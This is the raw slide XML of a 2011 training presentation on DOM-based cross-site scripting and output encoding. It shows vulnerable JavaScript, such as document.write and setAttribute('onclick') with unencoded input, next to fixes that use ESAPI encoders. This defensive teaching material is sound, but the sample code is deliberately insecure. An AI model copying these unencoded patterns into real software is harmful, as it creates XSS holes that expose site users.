              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>EVENT HANDLER CTX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>"…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document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>(“a2”).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>setAttribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>”, input);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&lt;SCRIPT&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>JAVASCRIPT CONTEXT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>&lt;/SCRIPT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>&gt;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document.scripts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>[0].text = input;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&lt;INPUT type="text" name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>=“i2"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value="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>HTML ATTRIBUTE CONTEXT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>/&gt;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document.forms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>[0].i2.value = input;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 Based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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638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Untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> data is passed to/consumed by JavaScript methods which:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Render HTML through DOM methods(Subject to Page Rendering Restructuring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacks)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> data to code executing JS functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> data to traditional XSS contexts (represented in DOM) where the attribute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>datatype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is a String</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> data to DOM methods which coerce strings into their native JS types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 Based XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Rendering HTML)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Render HTML through HTML Rendering DOM methods(Subject to Page Rendering Restructuring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacks)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>buildEchoPage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("input1")%&gt;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,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			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returnUrl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")%&gt;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…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function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>buildEchoPage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(input1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>myURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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("&lt;HTML&gt;&lt;head&gt;&lt;TITLE&gt;Echo Page&lt;/TITLE&gt;&lt;/head&gt;");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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("&lt;body&gt; Echo:  " + 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input1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pPr lvl="2"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("&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=\"" +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myURL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 +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> "\"&gt; Return to home page &lt;/a&gt; " + "&lt;/body&gt;&lt;/html&gt;);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}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>element.innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>element.outerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>document.writeln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>()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 Based XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Rendering HTML)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Render HTML through HTML Rendering DOM methods(Subject to Page Rendering Restructuring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacks)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>buildEchoPage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DefaultEncoder.encodeForJavascript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(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("input1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")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,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			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DefaultEncoder.encodeForJavascript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(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returnUrl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")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…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function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>buildEchoPage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(input1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>myURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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("&lt;HTML&gt;&lt;head&gt;&lt;TITLE&gt;Echo Page&lt;/TITLE&gt;&lt;/head&gt;");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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("&lt;body&gt; Echo:  " + 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input1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pPr lvl="2"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("&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=\"" +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myURL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 +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> "\"&gt; Return to home page &lt;/a&gt; " + "&lt;/body&gt;&lt;/html&gt;);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Mitigating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DOM Based XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Do all encoding (server side) before placing data in page entry point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err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>buildEchoPage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DefaultEncoder.encodeForJavascript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(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1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DefaultEncoder.encodeForHTML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("input1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")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))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,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DefaultEncoder.encodeForJavascript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(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1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DefaultEncoder.encodeForURL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returnUrl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")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))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…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>buildEchoPage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(input1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>myURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>("&lt;HTML&gt;&lt;head&gt;&lt;TITLE&gt;Echo Page&lt;/TITLE&gt;&lt;/head&gt;");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>("&lt;body&gt; Echo:  " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>input1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1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document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>("&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=\"" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>myURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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+ "\"&gt; Return to home page &lt;/a&gt; " + "&lt;/body&gt;&lt;/html&gt;);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Mitigating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DOM Based XSS </a:t>
            </a:r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encode (server side) before placing data in page entry point and HTML/URL encode within JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>buildEchoPage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DefaultEncoder.encodeForJavascript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(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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	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("input1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")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,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&lt;%=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>DefaultEncoder.encodeForJavascript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(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req.getParameter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("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returnUrl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")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%&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>'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…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function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>buildEchoPage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(input1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>myURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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("&lt;HTML&gt;&lt;head&gt;&lt;TITLE&gt;Echo Page&lt;/TITLE&gt;&lt;/head&gt;");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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("&lt;body&gt; Echo:  " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>				</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>		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$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ESAPI.encoder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().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>encodeForHTML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input1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B05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  <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"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 smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>("&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=\"" + 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$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ESAPI.encoder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().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>encodeForURL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myURL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+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> "\"&gt; Return to home page &lt;/a&gt; " + "&lt;/body&gt;&lt;/html&gt;);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/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5371</TotalTime>
  <Words>1348</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>313</Paragraphs>
  <Slides>31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DOM Based XSS and Proper Output Encoding</vt:lpstr>
      <vt:lpstr>Goals</vt:lpstr>
      <vt:lpstr>Review of DOM</vt:lpstr>
      <vt:lpstr>What’s Old is New</vt:lpstr>
      <vt:lpstr>DOM Based XSS</vt:lpstr>
      <vt:lpstr>DOM Based XSS 1 (Rendering HTML)</vt:lpstr>
      <vt:lpstr>DOM Based XSS 1 (Rendering HTML)</vt:lpstr>
      <vt:lpstr>Mitigating DOM Based XSS 1a</vt:lpstr>
      <vt:lpstr>Mitigating DOM Based XSS 1b</vt:lpstr>
      <vt:lpstr>DOM Based XSS 2 (code evaluating functions)</vt:lpstr>
      <vt:lpstr>Mitigating DOM Based XSS 2 (code evaluation)</vt:lpstr>
      <vt:lpstr>DOM Based XSS 3 (Traditional Contexts)</vt:lpstr>
      <vt:lpstr>Mitigating DOM Based XSS 3 (Traditional Contexts)</vt:lpstr>
      <vt:lpstr>DOM Based XSS 4 (through setAttribute)</vt:lpstr>
      <vt:lpstr>Mitigating DOM Based XSS 4 (through setAttribute)</vt:lpstr>
      <vt:lpstr>DOM XSS 5 (in HTML attribute context)</vt:lpstr>
      <vt:lpstr>DOM Based XSS 6 (Chameleon Context)</vt:lpstr>
      <vt:lpstr>Problems Associated with Mitigating XSS Using Output Encoding</vt:lpstr>
      <vt:lpstr>Characters Encoded by Encoding Library</vt:lpstr>
      <vt:lpstr>Encoding Semantics</vt:lpstr>
      <vt:lpstr>Side Effects</vt:lpstr>
      <vt:lpstr>Reverse Encoding at Runtime</vt:lpstr>
      <vt:lpstr>Encoding Fail #1 (Wrong Encoding)</vt:lpstr>
      <vt:lpstr>Encoding Fail #1 (Wrong Encoding Exploit)</vt:lpstr>
      <vt:lpstr>Encoding Fail #2 (Parser Interaction)</vt:lpstr>
      <vt:lpstr>Encoding Fail #2 (Parser exploit)</vt:lpstr>
      <vt:lpstr>Encoding Fail #3 (Auto Reverse Escaping at Runtime)</vt:lpstr>
      <vt:lpstr>Encoding Fail #4 (Reverse Encoding upon DOM retrieval)</vt:lpstr>
      <vt:lpstr>Black Lists Can Fail</vt:lpstr>
      <vt:lpstr>Conclusion</vt:lpstr>
      <vt:lpstr>Questions and Credits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 Based XSS and Proper Output Encoding</dc:title>
  <dc:creator>abek</dc:creator>
  <cp:lastModifiedBy>Abraham Kang</cp:lastModifiedBy>
  <cp:revision>352</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-11-14T01:41:40Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-12-01T03:29:57Z</dcterms:modified>
</cp:coreProperties>
</file>